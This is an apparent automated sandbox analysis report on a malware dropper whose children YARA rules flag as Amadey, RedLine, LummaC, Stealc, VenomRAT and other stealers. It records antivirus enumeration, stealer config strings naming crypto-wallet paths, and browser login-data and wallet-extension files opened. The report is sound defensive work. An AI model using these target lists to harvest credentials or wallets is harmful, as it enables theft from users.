Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D2D21C GetLocalTime,

0_2_00D2D21C

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D2D27A GetUserNameW,

0_2_00D2D27A

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00D0B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_00D0B952

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00CD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00CD42DE

Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected VenomRAT

Source: Yara match	File source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: 6d81c0d08d.exe, 00000015.00000003.2739517853.0000000008C2F000.00000004.00000020.00020000.00000000.sdmp, 6d81c0d08d.exe, 00000015.00000003.2691842338.0000000009448000.00000004.00000020.00020000.00000000.sdmp, 6d81c0d08d.exe, 00000015.00000003.2692311247.0000000008C2F000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 0a633717d1.exe, 00000017.00000003.2503678832.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000002.2632268244.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2560184062.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2564882043.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2673492338.000000000130E000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2725915516.000000000130E000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2932018598.00000000010F2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 12.2.skotes.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.skotes.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1511384246.0000000000E71000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1550989507.0000000000E71000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1534507361.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.2696699467.0000000000401000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY

Yara detected BrowserPasswordDump

Source: Yara match	File source: 54.2.48a23b3144.exe.463c26a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 1f8e467ee9.exe PID: 7216, type: MEMORYSTR

Yara detected GCleaner

Source: Yara match	File source: 20.3.b7668220f8.exe.dc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000003.2653292300.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 0a633717d1.exe PID: 2300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 376bb929a5.exe PID: 5776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 376bb929a5.exe PID: 7480, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 58.2.82ab3472d6.exe.3469550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 58.2.82ab3472d6.exe.3469550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.0.48a23b3144.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000036.00000000.2638833274.00000000005E2000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 0000003A.00000002.2843999557.0000000003469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[3].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 21.2.6d81c0d08d.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2888528335.0000000000D12000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2287725007.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6d81c0d08d.exe PID: 1160, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 0000002E.00000002.2788073324.0000000000A91000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2462878413.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2527448311.000000000153E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2504597683.0000000000A91000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000003.2639164297.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2848956151.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 327981c77b.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 327981c77b.exe PID: 5612, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected StormKitty Stealer

Source: Yara match	File source: 54.2.48a23b3144.exe.4518570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000036.00000002.2869409987.0000000003F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 6d81c0d08d.exe	String found in binary or memory: scord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AStrin
Source: 0a633717d1.exe	String found in binary or memory: um-LTC\\wallets","m":[""],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":[""],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"f
Source: 6d81c0d08d.exe	String found in binary or memory: JaxxxLiberty
Source: 0a633717d1.exe	String found in binary or memory: op","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance
Source: 6d81c0d08d.exe	String found in binary or memory: e\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVer
Source: 6d81c0d08d.exe	String found in binary or memory: e\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVer
Source: 0a633717d1.exe	String found in binary or memory: "en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/
Source: 0a633717d1.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000006.00000002.1471905694.0000000007E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: 0a633717d1.exe, 00000017.00000003.2560184062.0000000000B32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: bfnaelmomeimhlpmgjnjophhpkkoljpart\AppData\Roaming\Ledger Live

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
